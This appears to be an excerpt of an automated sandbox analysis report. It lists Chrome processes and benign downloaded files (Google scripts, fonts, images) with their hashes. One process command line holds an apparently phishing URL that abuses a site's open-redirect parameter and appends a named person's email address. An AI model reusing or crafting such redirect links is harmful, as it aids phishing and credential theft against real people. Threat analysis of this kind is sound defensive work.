                                                                                                                                                                                                                                                            Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var b=b||{};b.scope={};b.createTemplateTagFirstArg=function(a){return a.raw=a};b.createTemplateTagFirstArgWithRaw=function(a,c){a.raw=c;return a};b.arrayIteratorImpl=function(a){var c=0;return function(){return c<a.length?{done:!1,value:a[c++]}:{done:!0}}};b.arrayIterator=function(a){return{next:b.arrayIteratorImpl(a)}};b.makeIterator=function(a){var c="undefined"!=typeof Symbol&&Symbol.iterator&&a[Symbol.iterator];return c?c.call(a):b.arrayIterator(a)};.b.arrayFromIterator=function(a){for(var c,d=[];!(c=a.next()).done;)d.push(c.value);return d};b.arrayFromIterable=function(a){return a instanceof Array?a:b.arrayFromIterator(b.makeIterator(a))};b.ASSUME_ES5=!1;b.ASSUME_NO_NATIVE_MAP=!1;b.ASSUME_NO_NATIVE_SET=!1;b.SIMPLE_FROUND_POLYFILL=!1;b.ISOLATE_POLYFILLS=!1;b.FORCE_POLYFILL_PROMISE=!1;b.FORCE_POLYFILL_PROMISE_WHEN_NO_UNHANDLED_REJECTION=!1;.b.objectCreate=b.ASSUME_ES5||"function"==typeof
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):21522
                                                                                                                                                                                                                                                            Entropy (8bit):5.542470929403545
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:zJ9/iTyUGGyMfMaTGSMfcXwsGICfyRCsgtTc3C:NUqDX
                                                                                                                                                                                                                                                            MD5:AF80D390804AF6E9B48C3D2123F06675
                                                                                                                                                                                                                                                            SHA1:A78B36D231F6784222B4697F38E1BE4740931E2D
                                                                                                                                                                                                                                                            SHA-256:23864FAE283C666EB6331CEC2526832E807421407305B5A2CCFC4414BE508A15
                                                                                                                                                                                                                                                            SHA-512:51858A85C9FD5FCF8A5B68075645F0A40149359D692ABC27DD307E14A120B7A79A5A5F2EA081A50EC076C7ABF798692C6A636B736C50E53A5AEB0E00768EDA2E
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:"https://fonts.googleapis.com/css?family=Google+Sans+Text:400,500,700,400i,500i,700i|Google+Sans+Display:400|Google+Sans:400,500&display=swap&lang=en"
                                                                                                                                                                                                                                                            Preview:/*. * See: https://fonts.google.com/license/googlerestricted. */./* armenian */.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/googlesans/v45/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPiIUvaYr.woff2) format('woff2');. unicode-range: U+0308, U+0530-058F, U+2010, U+2024, U+25CC, U+FB13-FB17;.}./* cyrillic */.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/googlesans/v45/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPjYUvaYr.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* devanagari */.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/googlesans/v45/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPjMUvaYr.woff2) form
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, baseline, precision 8, 1000x400, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):133785
                                                                                                                                                                                                                                                            Entropy (8bit):7.968502133532597
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:CHz19c84Zs4u8PYh68aXy/YoOTM9H6Mi4rDdFbAG16rkQT:CHzjl4ZHpwhgSYvM9aMXbZUkQT
                                                                                                                                                                                                                                                            MD5:9FE66228FB8DB1AAD10C9B0450C5C000
                                                                                                                                                                                                                                                            SHA1:81683CA7F0D1BB43D22B7B3C5472C5074D294CFF
                                                                                                                                                                                                                                                            SHA-256:B2864B38C14F742875DED94EDDCD57E1F2E31A65F73259DB3F0A9523C5089954
                                                                                                                                                                                                                                                            SHA-512:F40AA70A0AAC367598EA8364527FE9A4BD60433855AE25D557AB5F546E2A82C08AB7DEFE531CB5FFD4B7D4B50087754D449DCFFDA26B02E4CD6256207F628FA1
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.google.com/logos/doodles/2016/icc-sri-lanka-v-west-indies-4888550698909696-hp2x.jpg
                                                                                                                                                                                                                                                            Preview:..................................................................................................................................................................................................................................................!..1.AQ"..W..a2....q.BR#ST..X...b.3..rC$..Vv7...%u6.w8...4..s.5U..cDEFf'.......................!.1A..Qaq.R......."2.....Bbr#ST...3...s4..C..$t5U6..c....%..u7D.e............?...........................................................................................am..7b.&'....aX!..u.....y-.k...S.}`......&.!Y......o.-"{...t..U..>....o8.....n..."%<l7..N.QYe...&.~....Q?2...s.7.H..73...G.yv.3p.[...7jL.....wK..].eYFI.K4j|...G..J..".-|"...5.r.|..........Z..iu.{.%..jv5.k.%13..e.%...I?..8..~.;.U.w+-.,....U.p_~..i....#.....3..u..s-.\...wD.$....;.....c.Ts.Ct.\..9.0|Jym.....r<Kl. ..)...m..fV.K....i...2.(...zS)..*.[?.KO.V;...-.,ceo.5<...W..q,.6G...._A0..]c7...R8..5>.D..RH.R%j^.X.5. .%...`y.f...D.y....@D.@D.@D.@D.@D.@D.@D.@D.@D.@D.@D.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=2, software=Picasa], baseline, precision 8, 660x255, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):47132
                                                                                                                                                                                                                                                            Entropy (8bit):7.970081285983661
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:j6oJ4BooN98eR14atGQWJjiWokMDOfdVoMs0KwlsbIZcchbK8q+:GoJhov8esmWd0kU0sMsIlohchrq+
                                                                                                                                                                                                                                                            MD5:B9B2AB9C33B5891752AC57029CF246A0
                                                                                                                                                                                                                                                            SHA1:B674F1AFB9A82E422375DD7C20C4BE7E983396D6
                                                                                                                                                                                                                                                            SHA-256:44FBB0BBCD635DB2DDDD5082E46D28135691FD1D88E3F8AC20292CEF027D88A1
                                                                                                                                                                                                                                                            SHA-512:DF9C1622244D62DAEF319AF9F8F26452C7063578EEBE24CA00354D25413CD09CBE7D11FC4A53E611B00CB88120163CE473586ED309CE02A8BBE066EFE48FE702
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/MUNO7NmgAs09RF0_Q4omjTtH7Fv6N6CpsLWNeZUIekGIwpadAooelENCI4enC02_j7yRtxhs5sUZaoGJ67dmrYie4nGDHHHQYF1poqHqNQ=s660
                                                                                                                                                                                                                                                            Preview:......JFIF.............RExif..II*.......1.......&...;.......-.......Picasa.Jon Wiley and Micheal Lopez..............................................................................................................................................................................................e............................!1."AQ.aq...#2R..3Bbr.....$CSsu.....46c.......%5DTVt......&....EUe.d.................................)......................!1AQq........a.".............?...E6.y.9kQ.uDt..hi^S.7.x..8L...*. ..P.h...F..........].4....Et....d.5K....a......9*.vD`.n7~.n.e.f9d.42.$..'..Hg....b.;....U.:;...F....I.c.....TDQvff!UT.K....W].v....(...........t..z...Q..#.".h...R.........j.. 1E5.*.dcI.).:r.....*.D.A..u%x...sI..GYE:TS...!.G&GS.T7W..0*..F ~....}.,2TTK..B.If..G./2..@.z.(..K.vY....#,.I".<.c..V*..QcO:.....H.H...(_.,.x.n.yM.o.X.$...mz80QT]DQ9..PC.D..n.k......]U...ee!....+...7......oo{.Y-..V..E.(..j.lJ...5..$.TP......7n7~ty..US0Y@QUJ......X.BA...$..,C*...|.[...\.y...
                                                                                                                                                                                                                                                            No static file info
                                                                                                                                                                                                                                                            Report size exceeds maximum size, go to the download page of this report and download PCAP to see all network behavior.

                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                                                            Start time:22:56:45
                                                                                                                                                                                                                                                            Start date:20/03/2023
                                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
                                                                                                                                                                                                                                                            Imagebase:0x7ff614650000
                                                                                                                                                                                                                                                            File size:2851656 bytes
                                                                                                                                                                                                                                                            MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                                                                            Start time:22:56:46
                                                                                                                                                                                                                                                            Start date:20/03/2023
                                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1944 --field-trial-handle=1712,i,17168280945086885359,14022515936100415220,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                            Imagebase:0x7ff614650000
                                                                                                                                                                                                                                                            File size:2851656 bytes
                                                                                                                                                                                                                                                            MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                                                                            Start time:22:56:47
                                                                                                                                                                                                                                                            Start date:20/03/2023
                                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.rxjapan.jp/?wptouch_switch=desktop&redirect=https%3A%2F%2Fmoneycointv.com%2Fwp-includes%2FAuth%2Fsf_rand_string_lowercase%286%29%2F%2F%2Fdan@glassvice.com
                                                                                                                                                                                                                                                            Imagebase:0x7ff614650000
                                                                                                                                                                                                                                                            File size:2851656 bytes
                                                                                                                                                                                                                                                            MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                                                                                            Start time:22:57:12
                                                                                                                                                                                                                                                            Start date:20/03/2023
                                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3164 --field-trial-handle=1712,i,17168280945086885359,14022515936100415220,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                            Imagebase:0x7ff614650000
                                                                                                                                                                                                                                                            File size:2851656 bytes
                                                                                                                                                                                                                                                            MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                                                                                            Start time:22:57:12
                                                                                                                                                                                                                                                            Start date:20/03/2023
                                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6152 --field-trial-handle=1712,i,17168280945086885359,14022515936100415220,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                            Imagebase:0x7ff614650000
                                                                                                                                                                                                                                                            File size:2851656 bytes
                                                                                                                                                                                                                                                            MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                                                                                            No disassembly